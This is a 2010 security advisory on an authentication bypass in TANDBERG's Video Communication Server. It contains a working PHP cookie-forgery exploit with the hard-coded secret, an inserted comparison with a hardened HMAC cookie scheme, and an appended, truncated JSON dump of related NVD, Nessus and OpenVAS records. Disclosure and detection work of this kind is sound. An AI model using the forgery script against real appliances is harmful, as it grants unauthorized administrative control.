-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Virtual Security Research, LLC.
http://www.vsecurity.com/
Security Advisory
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Advisory Name: TANDBERG Video Communication Server Authentication Bypass
Release Date: 2010-04-09
Application: Video Communication Server (VCS)
Versions: x4.2.1 and possibly earlier
Severity: Critical
Discovered by: Jon Hart and Timothy D. Morgan
Advisory by: Timothy D. Morgan <tmorgan (a) vsecurity . com>
Vendor Status: Update released (without security advisory) on October 9, 2009
CVE Candidate: CVE-2009-4509
Reference: http://www.vsecurity.com/resources/advisory/20100409-1/
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Product Description
- -------------------
- From [1]:
"The Video Communication Server (VCS) is an integral part of the TANDBERG
Total Solution and is the center of the video communications network,
connecting the benefits of video conferencing and telepresence to other
communications environments including unified communications and IP Telephony
networks."
Vulnerability Overview
- ----------------------
On December 2nd, VSR identified an authentication bypass vulnerability in
TANDBERG's Video Communication Server, firmware version x4.2.1. This
vulnerability allows for the complete bypass of authentication in the
administrative web console. Since this web interface can be used to execute
arbitrary code on the appliance as root (via software updates), the severity is
considered critical.
Product Background
- ------------------
The TANDBERG Video Communication Server is a Linux-based appliance which
supports the interoperation of a plethora of video and voice communications
devices. The VCS provides a web-based management interface implemented in PHP
which allows administrators to perform a wide variety of actions, including
configuration of the device, management of user accounts, firmware updates,
along with a number of other items.
Vulnerability Details
- ---------------------
The TANDBERG VCS web management interface utilizes custom cookies for the
purpose of session management. In version x4.2.1 of the appliance firmware
(and possibly earlier versions), it is possible to forge session cookies with
relatively little knowledge of the appliance's configuration.
The vulnerability lies in the files located at the following paths:
/tandberg/web/lib/secure.php
/tandberg/web/user/lib/secure.php
Routines in these files generate user session cookies in roughly the following
way:
SECRET = SERVER_ADDRESS + STATIC_VALUE
HASH = md5(USERNAME + SECRET + CLIENT_ADDRESS + CURRENT_TIME)
COOKIE = USERNAME + ACCESS_RIGHTS + CLIENT_ADDRESS + CURRENT_TIME + HASH
In the above pseudocode, the SERVER_ADDRESS represents the VCS system's IP
address, STATIC_VALUE represents a fixed string which is hard-coded into the
application source, USERNAME is the authenticated user name, CLIENT_ADDRESS is
the IP address of the user's system, CURRENT_TIME is a simple UNIX time stamp,
and ACCESS_RIGHTS is an integer denoting the level of access assigned to the
user.
Note that none of the information above is difficult to guess. Any owner of a
TANDBERG VCS would have access to the STATIC_VALUE (and in fact, this value is
contained in the firmware updates[2]). All TANDBERG appliances have a default
user name of "admin" which has full privileges. Therefore, it is possible with
a simple PHP script to forge new cookies and access the administrative
interface:
<?php
// NOTE: Portions of the following code are Copyright (C) 2009 TANDBERG //
function objectToCookie($obj)
{
    // Same encoding the appliance uses: serialize -> gzcompress -> base64
    $cookie = serialize($obj);
    $cookie = gzcompress($cookie);
    $cookie = base64_encode($cookie);
    return $cookie;
}

function genCookie($server_addr, $remote_addr)
{
    $user_name = "root";
    // SECRET = SERVER_ADDRESS + STATIC_VALUE (the hard-coded string)
    $secret = $server_addr . "139EF012B6A714A3BE0A867616C7F8";
    $time = time()+24*60*60;
    $id_hash = md5($user_name . $secret . $remote_addr . $time);
    $access = 1; // ReadWrite -- note that "access" is not part of $id_hash

    $login_cookie =
        array( "user_name" => $user_name,
               "access" => $access,
               "id_hash" => $id_hash,
               "ip" => $remote_addr,
               "time" => $time
             );

    return objectToCookie($login_cookie);
}

print "Cookie: tandberg_login="
    . urlencode(genCookie("{{SERVER_IP}}", "{{CLIENT_IP}}"))
    . "\n";
// end of script //
TANDBERG released firmware version x4.3.0 which corrects this issue on
October 9, 2009 (prior to discovery of the vulnerability by VSR). The release
notes[3] for this updated version contain a description of the issue:
"Improved the security of the web interface to ensure that the system will not,
under any circumstances, allow an authenticated user to escalate their session
to more advanced privileges [Ref # 65050]."
However, VSR felt this does not adequately describe the problem. Clearly, as
the above exploit and pseudocode demonstrate, it would be possible to alter an
existing login session cookie to provide elevated "access" values without
updating the MD5 hash, since this value isn't included when the hash is
generated. However, the larger issue is that cookies can be forged from scratch
without an existing session.
In addition to this lack of clarity, no apparent security advisory for this
issue was released to the public via the normal channels (nor was it recorded in
the CVE as of this writing). Therefore, VSR felt it was in the public interest to
shed further light on the problem.
Versions Affected
- -----------------
VSR has successfully exploited this issue in version x4.2.1. Earlier versions
may also be affected. Version x4.3.0 corrects the problem through use of a
random secret and the inclusion of the "access" value in the hash.
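The following is an added example, not code from the original advisory, from TANDBERG or from VSR. It places a model of the x4.2.1-style cookie check described above (MD5 over user name, guessable secret, client address and time, with "access" left out) next to a hardened scheme of the kind the advisory says x4.3.0 adopted (a random per-installation secret, with the access level covered by the hash), and then runs the same test against both: a cookie whose "access" field has been edited after issue. Everything here is this example's own assumption: the function and field names, the use of HMAC-SHA256 and JSON for the hardened cookie (the advisory does not say which construction x4.3.0 uses), the expiry handling, the numeric access values, and the STATIC_VALUE placeholder, which is not the real hard-coded string.

```php
<?php
// Added example, not code from TANDBERG or VSR. Models the x4.2.1-style cookie
// check described in the advisory next to a hardened scheme (random secret,
// access level covered by the hash). All names are this example's own;
// STATIC_VALUE is a placeholder, not the real hard-coded string.
const STATIC_VALUE = 'STATIC_VALUE_PLACEHOLDER';
const ACCESS_READ_ONLY = 0;   // assumed value
const ACCESS_READ_WRITE = 1;  // "ReadWrite" in the advisory's script

// ---- Weak scheme, after the advisory's pseudocode ---------------------------

function weakCookie(string $server, string $client, string $user, int $access, int $time): string
{
    $secret = $server . STATIC_VALUE;               // guessable: IP + fixed string
    $fields = [
        'user_name' => $user,
        'access'    => $access,                      // not covered by id_hash
        'id_hash'   => md5($user . $secret . $client . $time),
        'ip'        => $client,
        'time'      => $time,
    ];
    return base64_encode(gzcompress(serialize($fields)));
}

// Returns the cookie fields if the weak check passes, null otherwise.
// Expiry handling is assumed; the advisory only shows how the hash is built.
function weakVerify(string $cookie, string $server, string $client, int $now): ?array
{
    $raw = base64_decode($cookie, true);
    $data = $raw === false ? false : @gzuncompress($raw);
    if ($data === false) return null;
    // Never let unserialize() instantiate classes from attacker-controlled data.
    $f = @unserialize($data, ['allowed_classes' => false]);
    if (!is_array($f) || !isset($f['user_name'], $f['access'], $f['id_hash'], $f['ip'], $f['time'])) return null;
    $expected = md5($f['user_name'] . $server . STATIC_VALUE . $f['ip'] . $f['time']);
    // Plain string compare, as a naive implementation would do; see hash_equals() below.
    if ($f['id_hash'] !== $expected || $f['ip'] !== $client || $f['time'] < $now) return null;
    return $f;   // 'access' was never bound to the hash, so any value passes
}

// ---- Hardened scheme ---------------------------------------------------------

// Per-installation secret: generate once at install time and keep it outside the
// web root (for example in a root-owned file); generated in memory for this demo.
function newSecret(): string
{
    return random_bytes(32);
}

function strongCookie(string $secret, string $user, int $access, string $client, int $expires): string
{
    $payload = json_encode(['u' => $user, 'a' => $access, 'ip' => $client, 'exp' => $expires]);
    $tag = hash_hmac('sha256', $payload, $secret);   // MAC covers every field
    return base64_encode($payload) . '.' . $tag;
}

function strongVerify(string $secret, string $cookie, string $client, int $now): ?array
{
    $parts = explode('.', $cookie, 2);
    if (count($parts) !== 2) return null;
    $payload = base64_decode($parts[0], true);
    if ($payload === false) return null;
    // Constant-time comparison; check the MAC before trusting any field.
    if (!hash_equals(hash_hmac('sha256', $payload, $secret), $parts[1])) return null;
    $f = json_decode($payload, true);
    if (!is_array($f) || !isset($f['u'], $f['a'], $f['ip'], $f['exp'])) return null;
    if ($f['ip'] !== $client || $f['exp'] < $now) return null;
    return $f;
}

// ---- Test: does a post-issue edit of the access level go unnoticed? ----------

function editAccess(string $cookie, int $newAccess): string
{
    $f = unserialize(gzuncompress(base64_decode($cookie)), ['allowed_classes' => false]);
    $f['access'] = $newAccess;
    return base64_encode(gzcompress(serialize($f)));
}

$server = '192.0.2.10';        // constructed RFC 5737 documentation addresses
$client = '198.51.100.7';
$now = time();

$weak = weakCookie($server, $client, 'admin', ACCESS_READ_ONLY, $now + 3600);
$edited = editAccess($weak, ACCESS_READ_WRITE);
$res = weakVerify($edited, $server, $client, $now);
printf("weak scheme: edited cookie %s\n", $res ? 'accepted with access=' . $res['access'] : 'rejected');

$secret = newSecret();
$strong = strongCookie($secret, 'admin', ACCESS_READ_ONLY, $client, $now + 3600);
[$p, $tag] = explode('.', $strong, 2);
$edited = base64_encode(str_replace('"a":0', '"a":1', base64_decode($p))) . '.' . $tag;
$res = strongVerify($secret, $edited, $client, $now);
printf("hardened scheme: edited cookie %s\n", $res ? 'accepted' : 'rejected');
```

Run with `php cookie_check.php`: the weak check accepts the edited cookie with access=1, the hardened check rejects it because the MAC no longer matches. The two properties are separate. A random secret alone stops forgery from scratch, which is what the interim mitigation in the Recommendation section below buys, but as long as "access" stays outside the hash an already authenticated low-privilege user can still raise their own level, which is the escalation the x4.3.0 release notes refer to. Both the unpredictable secret and the full-field MAC are needed.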
Vendor Response
- ---------------
The following timeline details TANDBERG's response to the reported issue:
2009-12-09 Preliminary notice to TANDBERG. TANDBERG responded immediately.
2009-12-22 VSR provided TANDBERG a draft advisory.
2009-12-28 TANDBERG confirmed that this issue was corrected in version x4.3.
2010-04-07 TANDBERG VCS firmware version x5.1.1 released [2] which corrected
other flaws identified by VSR.
2010-04-09 VSR advisory released.
Recommendation
- --------------
Upgrade to firmware version x4.3.0 (or newer) as soon as possible. If this is
not immediately possible, temporary mitigation could be achieved by changing
the "$this->secret" constant in the following files to something unpredictable:
/tandberg/web/lib/secure.php
/tandberg/web/user/lib/secure.php
Note that other vulnerabilities were identified in firmware versions prior to
x5.1.1. Therefore, upgrading to this version is recommended. See CVE-2009-4510
and CVE-2009-4511 for more information.
Common Vulnerabilities and Exposures (CVE) Information
- ------------------------------------------------------
The Common Vulnerabilities and Exposures (CVE) project has assigned
the number CVE-2009-4509 to this issue. This is a candidate for
inclusion in the CVE list (http://cve.mitre.org), which standardizes
names for security problems.
Acknowledgements
- ----------------
Thanks to TANDBERG for the quick initial response and cooperation.
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
References:
1. TANDBERG - Video Communication Server
http://www.tandberg.com/video-conferencing-network-infrastructure/video-communication-server.jsp
2. TANDBERG VCS Firmware Downloads
http://ftp.tandberg.com/pub/software/vcs/
3. TANDBERG VCS Version x4 Software Release Notes
http://ftp.tandberg.com/pub/software/vcs/TANDBERG%20Video%20Communication%20Server%20Software%20Release%20Notes%20(X4).pdf
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Copyright 2009,2010 Virtual Security Research, LLC. All rights reserved.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)
iD8DBQFLv/V9Q1RSUNR+T+gRAggEAJ492/MpyOUcUgpTtKCJHHOed920hQCfexkq
5hYHqemkmGHiM1F4/7QzPXk=
=jbo1
-----END PGP SIGNATURE-----
"cvss3": {}, "published": "2010-04-13T17:30:00", "type": "cve", "title": "CVE-2009-4510", "cwe": ["CWE-310"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-4510"], "modified": "2018-08-13T21:47:00", "cpe": ["cpe:/a:vsecurity:tandberg_video_communication_server:x3.0.0", "cpe:/a:vsecurity:tandberg_video_communication_server:x4.2.1", "cpe:/a:vsecurity:tandberg_video_communication_server:x5.0.0", "cpe:/a:vsecurity:tandberg_video_communication_server:x2.1.0", "cpe:/a:vsecurity:tandberg_video_communication_server:x4.3.0", "cpe:/a:vsecurity:tandberg_video_communication_server:x1.1.0", "cpe:/a:vsecurity:tandberg_video_communication_server:x1.2.0", "cpe:/a:vsecurity:tandberg_video_communication_server:x4.2.0", "cpe:/a:vsecurity:tandberg_video_communication_server:x3.1.0", "cpe:/a:vsecurity:tandberg_video_communication_server:x1.0.0", "cpe:/a:vsecurity:tandberg_video_communication_server:x4.1.0", "cpe:/a:vsecurity:tandberg_video_communication_server:x2.0.0"], "id": "CVE-2009-4510", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-4510", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:vsecurity:tandberg_video_communication_server:x4.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:vsecurity:tandberg_video_communication_server:x5.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:vsecurity:tandberg_video_communication_server:x3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:vsecurity:tandberg_video_communication_server:x1.2.0:*:*:*:*:*:*:*", 
"cpe:2.3:a:vsecurity:tandberg_video_communication_server:x2.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:vsecurity:tandberg_video_communication_server:x3.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:vsecurity:tandberg_video_communication_server:x4.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:vsecurity:tandberg_video_communication_server:x2.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:vsecurity:tandberg_video_communication_server:x1.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:vsecurity:tandberg_video_communication_server:x4.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:vsecurity:tandberg_video_communication_server:x1.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:vsecurity:tandberg_video_communication_server:x4.2.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:08:28", "description": "Multiple directory traversal vulnerabilities in the web administration interface on the TANDBERG Video Communication Server (VCS) before X5.1 allow remote authenticated users to read arbitrary files via a .. (dot dot) in the page parameter to (1) helppage.php or (2) user/helppage.php.", "cvss3": {}, "published": "2010-04-13T17:30:00", "type": "cve", "title": "CVE-2009-4511", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-4511"], "modified": "2018-10-10T19:49:00", "cpe": ["cpe:/a:vsecurity:tandberg_video_communication_server:x3.0.0", "cpe:/a:vsecurity:tandberg_video_communication_server:x4.2.1", "cpe:/a:vsecurity:tandberg_video_communication_server:x2.1.0", "cpe:/a:vsecurity:tandberg_video_communication_server:x4.3.0", "cpe:/a:vsecurity:tandberg_video_communication_server:x1.1.0", 
"cpe:/a:vsecurity:tandberg_video_communication_server:x1.2.0", "cpe:/a:vsecurity:tandberg_video_communication_server:x4.2.0", "cpe:/a:vsecurity:tandberg_video_communication_server:x3.1.0", "cpe:/a:vsecurity:tandberg_video_communication_server:x1.0.0", "cpe:/a:vsecurity:tandberg_video_communication_server:x4.1.0", "cpe:/a:vsecurity:tandberg_video_communication_server:x2.0.0"], "id": "CVE-2009-4511", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-4511", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:vsecurity:tandberg_video_communication_server:x4.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:vsecurity:tandberg_video_communication_server:x3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:vsecurity:tandberg_video_communication_server:x1.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:vsecurity:tandberg_video_communication_server:x2.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:vsecurity:tandberg_video_communication_server:x3.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:vsecurity:tandberg_video_communication_server:x4.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:vsecurity:tandberg_video_communication_server:x2.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:vsecurity:tandberg_video_communication_server:x1.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:vsecurity:tandberg_video_communication_server:x4.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:vsecurity:tandberg_video_communication_server:x1.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:vsecurity:tandberg_video_communication_server:x4.2.0:*:*:*:*:*:*:*"]}], "nessus": [{"lastseen": "2023-01-11T15:07:34", "description": "The remote device appears to be a TANDBERG Video Communication Server (VCS), an appliance supporting interoperation of video conferencing and unified communications devices. \n\nThe fingerprint for the SSH service running on this device matches that of the host key distributed with some versions of the VCS firmware. 
\n\nKnowing this, a remote attacker may be able to impersonate or conduct man-in-the-middle attacks and gain shell access to the affected device.", "cvss3": {}, "published": "2010-04-14T00:00:00", "type": "nessus", "title": "TANDBERG Video Communication Server Static SSH Host Keys", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-4510"], "modified": "2018-11-15T00:00:00", "cpe": [], "id": "TANDBERG_VCS_SSH_KEY.NASL", "href": "https://www.tenable.com/plugins/nessus/45545", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(45545);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2018/11/15 20:50:22\");\n\n script_cve_id(\"CVE-2009-4510\");\n script_bugtraq_id(39389);\n\n script_name(english:\"TANDBERG Video Communication Server Static SSH Host Keys\");\n script_summary(english:\"Checks SSH fingerprint\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote SSH service uses a static host key.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote device appears to be a TANDBERG Video Communication Server\n(VCS), an appliance supporting interoperation of video conferencing\nand unified communications devices. \n\nThe fingerprint for the SSH service running on this device matches\nthat of the host key distributed with some versions of the VCS\nfirmware. 
\n\nKnowing this, a remote attacker may be able to impersonate or conduct\nman-in-the-middle attacks and gain shell access to the affected\ndevice.\"\n );\n script_set_attribute(attribute:\"see_also\", \n value:\"http://www.vsecurity.com/resources/advisory/20100409-2/\"\n );\n script_set_attribute(attribute:\"see_also\", \n value:\"https://www.securityfocus.com/archive/1/510654\"\n );\n script_set_attribute(attribute:\"solution\", \n value:\n\"Generate a new SSH host key and use it in place of the current one. \nThen upgrade to VCS firmware version 5.1.1 or later.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/04/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/04/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/04/14\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Gain a shell remotely\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.\");\n\n script_dependencie(\"ssh_detect.nasl\");\n script_require_ports(\"Services/ssh\", 22);\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n\nport = get_service(svc:\"ssh\", default:22, exit_on_fail:TRUE);\nif (!get_port_state(port)) exit(0, \"Port \"+port+\" is not open.\");\n\n\nfingerprint = get_kb_item(\"SSH/Fingerprint/ssh-dss/\"+port);\nif (!fingerprint) exit(0, \"There is no DSA host key associated with the SSH service on port \"+port+\".\");\n\n\nknown_fingerprint = \"4953bf942ad70c3f4829f75b5dde89b8\";\nif 
(tolower(fingerprint) == known_fingerprint)\n{\n if (report_verbosity > 0)\n {\n fingerprint = ereg_replace(pattern:\"(..)\", replace:\"\\1:\", string:fingerprint);\n fingerprint = substr(fingerprint, 0, strlen(fingerprint)-2);\n\n report = \n '\\nThe DSA host key used by this service has been fingerprinted as :\\n' +\n '\\n' +\n ' ' + fingerprint + '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0); \n}\nelse exit(0, \"The DSA host key associated with the SSH service on port \"+port+\" does not match the default used by VCS.\");\n", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:23:53", "description": "", "cvss3": {}, "published": "2010-04-12T00:00:00", "type": "packetstorm", "title": "Tandberg VCS Arbitrary File Retrieval", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2009-4511"], "modified": "2010-04-12T00:00:00", "id": "PACKETSTORM:88240", "href": "https://packetstormsecurity.com/files/88240/Tandberg-VCS-Arbitrary-File-Retrieval.html", "sourceData": "", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/88240/tandberg-fileretrieval.txt"}], "openvas": [{"lastseen": "2020-05-08T11:00:20", "description": "The remote host uses a default SSH host key that is shared among\n multiple installations.", "cvss3": {}, "published": "2016-01-05T00:00:00", "type": "openvas", "title": "Known SSH Host Key", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7256", "CVE-2008-0166", "CVE-2015-6358", "CVE-2015-8260", "CVE-2015-7276", "CVE-2015-8251", "CVE-2015-7255", "CVE-2009-4510"], "modified": "2020-05-04T00:00:00", "id": "OPENVAS:1361412562310105497", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105497", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Known SSH Host Key\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105497\");\n script_version(\"2020-05-04T13:55:28+0000\");\n script_name(\"Known SSH Host Key\");\n script_cve_id(\"CVE-2015-6358\", \"CVE-2015-7255\", \"CVE-2015-7256\", \"CVE-2015-7276\", \"CVE-2015-8251\",\n \"CVE-2015-8260\", \"CVE-2009-4510\", \"CVE-2008-0166\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-05-04 13:55:28 +0000 (Mon, 04 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-01-05 13:21:28 +0100 (Tue, 05 Jan 2016)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_dependencies(\"ssh_proto_version.nasl\");\n script_require_ports(\"Services/ssh\", 22);\n script_mandatory_keys(\"SSH/fingerprints/available\");\n\n script_xref(name:\"URL\", value:\"https://blog.shodan.io/duplicate-ssh-keys-everywhere/\");\n script_xref(name:\"URL\", value:\"https://www.kb.cert.org/vuls/id/566724\");\n script_xref(name:\"URL\", value:\"http://blogs.intevation.de/thomas/hetzner-duplicate-ed25519-ssh-host-keys/\");\n script_xref(name:\"URL\", value:\"https://www.vsecurity.com/download/advisories/20100409-2.txt\");\n script_xref(name:\"URL\", value:\"https://wiki.debian.org/SSLkeys\");\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2008/dsa-1571\");\n script_xref(name:\"URL\", value:\"https://github.com/g0tmi1k/debian-ssh\");\n\n script_tag(name:\"summary\", value:\"The remote host uses a default SSH host key 
that is shared among\n multiple installations.\");\n\n script_tag(name:\"impact\", value:\"An attacker could use this situation to compromise or eavesdrop on the SSH\n communication between the client and the server using a man-in-the-middle attack.\");\n\n script_tag(name:\"insight\", value:\"The list of known SSH host keys used by this plugin is a gathered from various\n sources:\n\n - Top 1.000 Duplicate SSH Fingerprints on the Internet collected via the search engine Shodan in 2015.\n The most common fingerprint was found to be shared among 245.000 installations where the least common was\n still present 321 times.\n\n - SSH host keys generated with a vulnerable OpenSSL version on Debian and derivates (CVE-2008-0166).\n\n - Devices of Multiple Vendors (Cisco, ZTE, ZyXEL, OpenStage, OpenScape, TANDBERG) using hardcoded SSH host keys\n (CVE-2015-6358, CVE-2015-7255, CVE-2015-7256, CVE-2015-7276, CVE-2015-8251, CVE-2015-8260, CVE-2009-4510).\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if the remote host responds with a known SSH host key.\");\n\n script_tag(name:\"solution\", value:\"Generate a new SSH host key.\");\n\n script_tag(name:\"solution_type\", value:\"Workaround\");\n script_tag(name:\"qod_type\", value:\"remote_active\");\n\n exit(0);\n}\n\ninclude(\"bad_ssh_host_keys.inc\");\ninclude(\"ssh_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http_func.inc\"); # For make_list_unique()\n\n# bad_ssh_host_keys.inc might have duplicated host keys for easier\n# maintenance so we will make the list here \"unique\" before\nbad_host_keys = make_list_unique( bad_host_keys );\n\nport = ssh_get_port( default:22 );\n\nforeach algo( ssh_host_key_algos ) {\n\n host_key = get_kb_item( \"SSH/\" + port + \"/fingerprint/\" + algo );\n if( ! host_key || ! 
strlen( host_key ) )\n continue;\n\n if( in_array( search:host_key, array:bad_host_keys, part_match:FALSE ) ) {\n _report += algo + \" \" + host_key + '\\n';\n bhk_found = TRUE;\n }\n\n # Those two are workarounds as we can't include such huge lists into NASL/NVTs.\n # The greps will return something like \"dd:f3:cc:a5:94:95:d3:75:45:be:26:be:1b:13:e0:05\"\n # (including the double apostrophe) if a match was found.\n # nb: Make sure to update the path below if moving the includes or this NVT around.\n if( algo == \"ssh-rsa\" ) {\n argv = make_list( \"grep\", host_key, \"../bad_rsa_ssh_host_keys.txt\" );\n res = pread( cmd:\"grep\", argv:argv, cd:FALSE );\n if( res == '\"' + host_key + '\"' ) {\n _report += algo + \" \" + host_key + '\\n';\n bhk_found = TRUE;\n }\n }\n\n if( algo == \"ssh-dss\" ) {\n argv = make_list( \"grep\", host_key, \"../bad_dsa_ssh_host_keys.txt\" );\n res = pread( cmd:\"grep\", argv:argv, cd:FALSE );\n if( res == '\"' + host_key + '\"' ) {\n _report += algo + \" \" + host_key + '\\n';\n bhk_found = TRUE;\n }\n }\n}\n\nif( bhk_found ) {\n report = 'The following known SSH hosts key(s) were found:\\n' + _report;\n security_message( port:port, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}]}